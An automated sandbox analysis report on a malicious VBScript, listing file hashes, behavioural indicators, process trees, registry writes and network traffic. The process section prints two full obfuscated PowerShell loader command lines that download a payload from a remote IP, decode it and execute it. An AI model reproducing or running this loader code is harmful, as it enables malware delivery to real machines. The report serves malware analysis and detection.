File name:

733012c16a8f4e25dce16574f12365eb8616c62313da5f97241599c5864f0c50.vbs

Full analysis: https://app.any.run/tasks/12bb816b-0e5f-4c22-8ddc-f065f5dc78bd
Verdict: Malicious activity
Analysis date: May 14, 2024, 06:10:58
OS: Windows 10 Professional (build: 19045, 64 bit)
Indicators:
MIME: text/plain
File info: ASCII text, with CRLF line terminators
MD5:

3443D85844AC2D8B4A8E85C02C548B42

SHA1:

554437C5ED38FF1C09D40DACEC3F0B9CCD0B82D4

SHA256:

733012C16A8F4E25DCE16574F12365EB8616C62313DA5F97241599C5864F0C50

SSDEEP:

6144:7syS5Hz0L9jTGquGSqCG2NPnbY/0M7xxMldTSsp3vraSEPW/snrOLNC51gdQl7VJ:nCRT+WPxm3pfqiMwc/MVqAd+2

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    No malicious indicators.

  • SUSPICIOUS

    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 6196)
      • powershell.exe (PID: 6232)

    • Suspicious use of asymmetric encryption in PowerShell

      • wscript.exe (PID: 6196)
      • powershell.exe (PID: 6232)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 6196)

    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 6232)
      • powershell.exe (PID: 6160)

    • Connects to the server without a host name

      • powershell.exe (PID: 6232)

    • The Powershell connects to the Internet

      • powershell.exe (PID: 6232)

    • Unusual connection from system programs

      • powershell.exe (PID: 6232)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 6232)
      • powershell.exe (PID: 6160)

    • Converts a specified value to a byte (POWERSHELL)

      • powershell.exe (PID: 6160)

  • INFO

    • Reads the software policy settings

      • slui.exe (PID: 7128)

    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 6232)
      • powershell.exe (PID: 6160)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 6232)
      • powershell.exe (PID: 6160)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 6232)
      • powershell.exe (PID: 6160)

    • Creates or changes the value of an item property via Powershell

      • wscript.exe (PID: 6196)
      • powershell.exe (PID: 6232)

    • Checks proxy server information

      • powershell.exe (PID: 6232)

    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 6232)
      • powershell.exe (PID: 6160)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
134
Monitored processes
10
Malicious processes
2
Suspicious processes
1

Behavior graph

Click at the process to see the details
start wscript.exe no specs sppextcomobj.exe no specs slui.exe slui.exe no specs filecoauth.exe no specs powershell.exe conhost.exe no specs cmd.exe no specs powershell.exe no specs cmd.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1684\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3528C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
4484"C:\WINDOWS\system32\cmd.exe" /c "echo %appdata%\Ankomstrkkeflger234.Unp && echo f7f81a39-5f63-5b42-9efd-1f13b5431005quot;C:\Windows\System32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
5092C:\Users\admin\AppData\Local\Microsoft\OneDrive\19.043.0304.0013\FileCoAuth.exe -EmbeddingC:\Users\admin\AppData\Local\Microsoft\OneDrive\19.043.0304.0013\FileCoAuth.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft OneDriveFile Co-Authoring Executable
Exit code:
0
Version:
19.043.0304.0013
Modules
Images
c:\users\admin\appdata\local\microsoft\onedrive\19.043.0304.0013\filecoauth.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\user32.dll
c:\windows\syswow64\win32u.dll
6160"C:\WINDOWS\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Antiatommarchens183 = 1;$Ridsenaales='Su';$Ridsenaales+='bstrin';$Ridsenaales+='g';Function Unaccommodatingness($swamped){$Mortgages=$swamped.Length-$Antiatommarchens183;For($Indicolite=2;$Indicolite -lt $Mortgages;$Indicolite+=3){$Stiftelsesoverenskomsten+=$swamped.$Ridsenaales.Invoke( $Indicolite, $Antiatommarchens183);}$Stiftelsesoverenskomsten;}function dihalogen($Chasteweed){. ($Roegtes) ($Chasteweed);}$Bearbejdelige=Unaccommodatingness ' MF,oSez.xiSnlPal.oa l/Va5 a. ,0.r Gl(,uW niIrnR.d SoDawAfs,o TrNCiTNa af1Hy0.e.Te0 n;.e ,WKoiT npe6C.4Vi;Te Trxlu6 S4 t;C. H,rHevPr:U 1Vr2Te1Fl.Sy0By) . TGAne .c Ck Fo,a/T 2 T0 ,1Al0Du0 o1,l0,u1Re BaFNjiRar keMaf ,oEkxTo/ E1Xa2 ,1Bl. H0F. ';$Dreas=Unaccommodatingness ' UStsReeObr.e-FrAR gsne mnubt ';$Sdsuppens=Unaccommodatingness 'MohP,t kt apB :Ar/ B/ .1T 7G,8La.To2 B1Wo5Ve.Do2An3Pi6Ed.U,2 C2,e9.r/D,WUno SrTwdPssAnt HaA.rEmsTi.S c,esBnvCa ';$sknsforretning=Unaccommodatingness 'A.>P. ';$Roegtes=Unaccommodatingness ' LiV.ePoxPr ';$Ignitions='Oilhole';dihalogen (Unaccommodatingness 'ViSBre etEy- oC lo SnUrt .ehinSut y Me-PsPHuaAdtEnhC, HTSa: Y\KaSF,h lr.aiPse,akL.iV.l .yGr.Emt PxA.t h o-TiVSuaR lAnuSyeWe Ny$,iIBrg InOmiPstCoi.to ,n msug;,y ');dihalogen (Unaccommodatingness 'OviLif B Ch(PatNoeXesS t .-.ep na,etSohAl GaT.r: a\CoS.lhSyrHeifje.ok.oi SlP,y t. AtN.xBotAa)Sk{Ufe ,xUdi.at d},i; . ');$Rivieraens = Unaccommodatingness 'C.eThcArhI.oW, S% ha up.ap,rdAfa .t aaMi%S,\SeAStnAlk Fo ,mFis ,tsqrHgkQukCoe IfTnl,rgAreDerTu2,r3s,4Re.H.US n .p U T,& ,&Lo maeAlcBehCeo B ke$ , ';dihalogen (Unaccommodatingness ' .$ g,el.loS,bR aChlKl:NaUC.dItvAba GnSydT.rS eGlnBudphe Us.o=Al(.gcAsm,id.u In/Spc,h Kl$SaRNoiS vkaiToeLurdaaboeKlnvasP.) . ');dihalogen (Unaccommodatingness 'Te$DigLal oombala SlHo:AcM saHjl.olPhoVas ,eO,iSusSpmRoi LcTa=Be$.eSM dubsTuuVipChpPreopn gsUr.SesOdp HlJeiret ,(Ad$ FsBikWanO,s.ufslo or Urdae ct Tn PiU,nRugDe)In ');$Sdsuppens=$Malloseismic[0];dihalogen (Unaccommodatingness ' S$nagT,l SoPibUnaG.lO.:T,VWreP r Bt tiStkGra li,sI.= .N BeU,w.y-CaOEqb.oj ,ea.cSit T .SAvyBeslatSkeLumBe. .NS eDet A.ArWF e,eb.eCBilmiiHve CnP,tN ');dihalogen (Unaccommodatingness ' P$AaVTseGurF.t DidekBoaMil,lsAn. BH .e ra ,dPeeT rCisEa[ P$I,D dr .eC.aFisS ]Kr=Pr$F B He,ra DrC.bS e jS,dMieSalL.iF,g.ae P ');$Ublufrdigst=Unaccommodatingness 'D,VGee,ar AtN istka aY l Ks r.InD ToBow on ul aoVua.edEcF aiKrl.oepr(Do$c,S,ld Es u SpKlpGre .nInsRu, J$PrAFon.ug Ur .eFrbPas,oschpF,iColPalPreBatko) ';$Ublufrdigst=$Udvandrendes[1]+$Ublufrdigst;$Angrebsspillet=$Udvandrendes[0];dihalogen (Unaccommodatingness '.v$I.gExlK,oFsbCaaKol N:EpD Ti oaHal,toKog afSeoIlr,smPhe.oneas J=Af( FTTreHesTrtMu-GePMiaFltA,hin A$ ASknPlgtrrOveBab DsFosGlpAsiU,lDilTie ItWa)Na ');while (!$Dialogformens) {dihalogen (Unaccommodatingness ' N$A.gPul AoI bO.a.al o:BuQBauTviSezS,esitFdsa = .$CatUfrT uSpeAr ') ;dihalogen $Ublufrdigst;dihalogen (Unaccommodatingness ',iSFitBea.tr AtVa-TrSE lFae Te.ypVa T,4Pe ');dihalogen (Unaccommodatingness 'A,$Ilgf,linoshbC.aknlm,: KDPoiBlaGrl ,o gM,fH oEgr OmUne FnB.s p=.t(OeTKee esGrt,p- NP paStt,ihSe Ab$CaA.pn PgGarSceWebGesDesHup istl.ml OeS.tCo)K. ') ;dihalogen (Unaccommodatingness 'Ty$Fog al oo,cbA aFylJa:,iV .oUnkl s.ne .sBatDeeD.d oe atTa=.i$ SgEbl RofobWiaEnlPa:NyTHou OsSpiTunF.dTreSudAbe olFr1Fa8Pi0Se+Go+An%Or$HaMDoat,l Nl.eo Us,peskiK s Pm SiF,cD..OzcAmoPruDen It.n ') ;$Sdsuppens=$Malloseismic[$Voksestedet];}$Sunlet=317389;$Teutonomania=27077;dihalogen (Unaccommodatingness 'Re$Degufl SoPab iaT,lLo:P.PDaoBelH.y TpFahS.owinTeeFyd a s= M TaGAkeS.tGy-idCAboDen.ot .e bn Rt.r Tr$ SA on Cg .rP,estb Rs.lsH p Fi Clcol GeCot.e ');dihalogen (Unaccommodatingness '.a$spgBjlLioUpbP.a .lVe:OoD .uPrpMal ,iV,kHyeOurSkiMinS.g.eeFrrN. T=Oo Jr[L.S py sFltMaeS.m O.SrC So .n .v.ueE.r rtKa] t:am:KlFBerSco FmUnBOua ,s,neF 6Tr4HoSSytb rSaiFon.tg K(Fr$ .PMoo.ol.ayTypReh BoChnafeH.dRd)Es ');dihalogen (Unaccommodatingness 'Ba$C.gKhlU.oKib AaFolAn:S.WT.ilrvTiiLaa AnD ud=H. [WaSAxyHes t PeQ mQu.,aTDaeD,x,rtKv.SiE inSvcKno od ,iE.n Og ,].i:Im:AnAUbS,dCT ICoI ,.KiGBle.rtOpSsktForEfiLonKngGo(A.$ TDZ.u op Rl ui,okA,ePerDeiHen.hg,ne.irMu)fl ');dihalogen (Unaccommodatingness 'Ha$P,gS.l.oo obTea Elhd:.vMEko LoSdr SiP.n ,g lsV,= A$C WSyiSuv LiCya .nSt. .s FuVab s,ntMer Ci,onCigOr(Un$ rSTeuOcnInlGre tC.,Do$ToTAdeL u At Soc.nOmoExmBlaG.nA.ibaaCo) , ');dihalogen $Moorings;"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
6196"C:\WINDOWS\System32\WScript.exe" C:\Users\admin\AppData\Local\Temp\733012c16a8f4e25dce16574f12365eb8616c62313da5f97241599c5864f0c50.vbsC:\Windows\System32\wscript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6232"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Antiatommarchens183 = 1;$Ridsenaales='Su';$Ridsenaales+='bstrin';$Ridsenaales+='g';Function Unaccommodatingness($swamped){$Mortgages=$swamped.Length-$Antiatommarchens183;For($Indicolite=2;$Indicolite -lt $Mortgages;$Indicolite+=3){$Stiftelsesoverenskomsten+=$swamped.$Ridsenaales.Invoke( $Indicolite, $Antiatommarchens183);}$Stiftelsesoverenskomsten;}function dihalogen($Chasteweed){. ($Roegtes) ($Chasteweed);}$Bearbejdelige=Unaccommodatingness ' MF,oSez.xiSnlPal.oa l/Va5 a. ,0.r Gl(,uW niIrnR.d SoDawAfs,o TrNCiTNa af1Hy0.e.Te0 n;.e ,WKoiT npe6C.4Vi;Te Trxlu6 S4 t;C. H,rHevPr:U 1Vr2Te1Fl.Sy0By) . TGAne .c Ck Fo,a/T 2 T0 ,1Al0Du0 o1,l0,u1Re BaFNjiRar keMaf ,oEkxTo/ E1Xa2 ,1Bl. H0F. ';$Dreas=Unaccommodatingness ' UStsReeObr.e-FrAR gsne mnubt ';$Sdsuppens=Unaccommodatingness 'MohP,t kt apB :Ar/ B/ .1T 7G,8La.To2 B1Wo5Ve.Do2An3Pi6Ed.U,2 C2,e9.r/D,WUno SrTwdPssAnt HaA.rEmsTi.S c,esBnvCa ';$sknsforretning=Unaccommodatingness 'A.>P. ';$Roegtes=Unaccommodatingness ' LiV.ePoxPr ';$Ignitions='Oilhole';dihalogen (Unaccommodatingness 'ViSBre etEy- oC lo SnUrt .ehinSut y Me-PsPHuaAdtEnhC, HTSa: Y\KaSF,h lr.aiPse,akL.iV.l .yGr.Emt PxA.t h o-TiVSuaR lAnuSyeWe Ny$,iIBrg InOmiPstCoi.to ,n msug;,y ');dihalogen (Unaccommodatingness 'OviLif B Ch(PatNoeXesS t .-.ep na,etSohAl GaT.r: a\CoS.lhSyrHeifje.ok.oi SlP,y t. AtN.xBotAa)Sk{Ufe ,xUdi.at d},i; . ');$Rivieraens = Unaccommodatingness 'C.eThcArhI.oW, S% ha up.ap,rdAfa .t aaMi%S,\SeAStnAlk Fo ,mFis ,tsqrHgkQukCoe IfTnl,rgAreDerTu2,r3s,4Re.H.US n .p U T,& ,&Lo maeAlcBehCeo B ke$ , ';dihalogen (Unaccommodatingness ' .$ g,el.loS,bR aChlKl:NaUC.dItvAba GnSydT.rS eGlnBudphe Us.o=Al(.gcAsm,id.u In/Spc,h Kl$SaRNoiS vkaiToeLurdaaboeKlnvasP.) . ');dihalogen (Unaccommodatingness 'Te$DigLal oombala SlHo:AcM saHjl.olPhoVas ,eO,iSusSpmRoi LcTa=Be$.eSM dubsTuuVipChpPreopn gsUr.SesOdp HlJeiret ,(Ad$ FsBikWanO,s.ufslo or Urdae ct Tn PiU,nRugDe)In ');$Sdsuppens=$Malloseismic[0];dihalogen (Unaccommodatingness ' S$nagT,l SoPibUnaG.lO.:T,VWreP r Bt tiStkGra li,sI.= .N BeU,w.y-CaOEqb.oj ,ea.cSit T .SAvyBeslatSkeLumBe. .NS eDet A.ArWF e,eb.eCBilmiiHve CnP,tN ');dihalogen (Unaccommodatingness ' P$AaVTseGurF.t DidekBoaMil,lsAn. BH .e ra ,dPeeT rCisEa[ P$I,D dr .eC.aFisS ]Kr=Pr$F B He,ra DrC.bS e jS,dMieSalL.iF,g.ae P ');$Ublufrdigst=Unaccommodatingness 'D,VGee,ar AtN istka aY l Ks r.InD ToBow on ul aoVua.edEcF aiKrl.oepr(Do$c,S,ld Es u SpKlpGre .nInsRu, J$PrAFon.ug Ur .eFrbPas,oschpF,iColPalPreBatko) ';$Ublufrdigst=$Udvandrendes[1]+$Ublufrdigst;$Angrebsspillet=$Udvandrendes[0];dihalogen (Unaccommodatingness '.v$I.gExlK,oFsbCaaKol N:EpD Ti oaHal,toKog afSeoIlr,smPhe.oneas J=Af( FTTreHesTrtMu-GePMiaFltA,hin A$ ASknPlgtrrOveBab DsFosGlpAsiU,lDilTie ItWa)Na ');while (!$Dialogformens) {dihalogen (Unaccommodatingness ' N$A.gPul AoI bO.a.al o:BuQBauTviSezS,esitFdsa = .$CatUfrT uSpeAr ') ;dihalogen $Ublufrdigst;dihalogen (Unaccommodatingness ',iSFitBea.tr AtVa-TrSE lFae Te.ypVa T,4Pe ');dihalogen (Unaccommodatingness 'A,$Ilgf,linoshbC.aknlm,: KDPoiBlaGrl ,o gM,fH oEgr OmUne FnB.s p=.t(OeTKee esGrt,p- NP paStt,ihSe Ab$CaA.pn PgGarSceWebGesDesHup istl.ml OeS.tCo)K. ') ;dihalogen (Unaccommodatingness 'Ty$Fog al oo,cbA aFylJa:,iV .oUnkl s.ne .sBatDeeD.d oe atTa=.i$ SgEbl RofobWiaEnlPa:NyTHou OsSpiTunF.dTreSudAbe olFr1Fa8Pi0Se+Go+An%Or$HaMDoat,l Nl.eo Us,peskiK s Pm SiF,cD..OzcAmoPruDen It.n ') ;$Sdsuppens=$Malloseismic[$Voksestedet];}$Sunlet=317389;$Teutonomania=27077;dihalogen (Unaccommodatingness 'Re$Degufl SoPab iaT,lLo:P.PDaoBelH.y TpFahS.owinTeeFyd a s= M TaGAkeS.tGy-idCAboDen.ot .e bn Rt.r Tr$ SA on Cg .rP,estb Rs.lsH p Fi Clcol GeCot.e ');dihalogen (Unaccommodatingness '.a$spgBjlLioUpbP.a .lVe:OoD .uPrpMal ,iV,kHyeOurSkiMinS.g.eeFrrN. T=Oo Jr[L.S py sFltMaeS.m O.SrC So .n .v.ueE.r rtKa] t:am:KlFBerSco FmUnBOua ,s,neF 6Tr4HoSSytb rSaiFon.tg K(Fr$ .PMoo.ol.ayTypReh BoChnafeH.dRd)Es ');dihalogen (Unaccommodatingness 'Ba$C.gKhlU.oKib AaFolAn:S.WT.ilrvTiiLaa AnD ud=H. [WaSAxyHes t PeQ mQu.,aTDaeD,x,rtKv.SiE inSvcKno od ,iE.n Og ,].i:Im:AnAUbS,dCT ICoI ,.KiGBle.rtOpSsktForEfiLonKngGo(A.$ TDZ.u op Rl ui,okA,ePerDeiHen.hg,ne.irMu)fl ');dihalogen (Unaccommodatingness 'Ha$P,gS.l.oo obTea Elhd:.vMEko LoSdr SiP.n ,g lsV,= A$C WSyiSuv LiCya .nSt. .s FuVab s,ntMer Ci,onCigOr(Un$ rSTeuOcnInlGre tC.,Do$ToTAdeL u At Soc.nOmoExmBlaG.nA.ibaaCo) , ');dihalogen $Moorings;"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6816"C:\WINDOWS\system32\cmd.exe" /c "echo %appdata%\Ankomstrkkeflger234.Unp && echo f7f81a39-5f63-5b42-9efd-1f13b5431005quot;C:\Windows\SysWOW64\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
7096C:\WINDOWS\system32\SppExtComObj.exe -EmbeddingC:\Windows\System32\SppExtComObj.Exesvchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
KMS Connection Broker
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sppextcomobj.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\oleaut32.dll
7128"C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEventC:\Windows\System32\slui.exe
SppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
Total events
15 624
Read events
15 601
Write events
23
Delete events
0

Modification events

(PID) Process:(3528) slui.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\3c\52C64B7E
Operation:writeName:@%SystemRoot%\System32\sppcomapi.dll,-3200
Value:
Software Licensing
(PID) Process:(6196) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(6196) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(6196) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(6196) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(6232) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(6232) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(6232) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(6232) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(6232) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
Executable files
0
Suspicious files
2
Text files
5
Unknown types
0

Dropped files

PID
Process
Filename
Type
5092FileCoAuth.exeC:\Users\admin\AppData\Local\Microsoft\OneDrive\logs\Common\FileCoAuth-2024-05-14.0612.5092.1.aodlbinary
MD5:28DCA2FF4B34B5A52A2E59DF202A6ED3
SHA256:33BACCB7296F1ED1F995FC77A23049F261CF391AC0388F9E8DD161F8C17B7F94
6232powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_de0c1mlt.hyy.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5092FileCoAuth.exeC:\Users\admin\AppData\Local\Microsoft\OneDrive\logs\Common\FileCoAuth-2024-05-14.0612.5092.1.odlbinary
MD5:231AD7C7AF77903A2554300F76653B67
SHA256:14EA19006D48F1ED8E3484288F1172FDB28CA3986BEBDD92B5B72F31415120FC
6232powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_cs1kbiun.b14.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6160powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_2bownn0e.3ga.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6160powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_xrwresrr.dry.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6232powershell.exeC:\Users\admin\AppData\Roaming\Ankomstrkkeflger234.Unptext
MD5:D6EE805F62D87E0D248143752679F5AD
SHA256:7E415B8ABC4C21CF4B8A3E24F3B09AFD50866B79E566D5D51C0AD5FE7D04A89E
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
45
DNS requests
16
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5548
svchost.exe
GET
200
23.37.9.217:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
unknown
5260
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
unknown
5548
svchost.exe
GET
200
23.216.155.114:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
unknown
6352
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEApDqVCbATUviZV57HIIulA%3D
unknown
unknown
4024
SIHClient.exe
GET
200
23.37.9.217:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
unknown
4024
SIHClient.exe
GET
200
23.37.9.217:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
unknown
6232
powershell.exe
GET
200
178.215.236.229:80
http://178.215.236.229/Wordstars.csv
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4364
svchost.exe
239.255.255.250:1900
unknown
4
System
192.168.100.255:138
unknown
5548
svchost.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
5380
RUXIMICS.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
5140
MoUsoCoreWorker.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
5548
svchost.exe
23.216.155.114:80
crl.microsoft.com
Akamai International B.V.
IE
unknown
5548
svchost.exe
23.37.9.217:80
www.microsoft.com
AKAMAI-AS
PH
unknown
5260
svchost.exe
20.190.160.17:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
5260
svchost.exe
192.229.221.95:80
EDGECAST
US
whitelisted
1032
svchost.exe
23.37.9.150:443
go.microsoft.com
AKAMAI-AS
PH
unknown

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 20.73.194.208
whitelisted
crl.microsoft.com
  • 23.216.155.114
  • 23.216.155.66
whitelisted
www.microsoft.com
  • 23.37.9.217
whitelisted
login.live.com
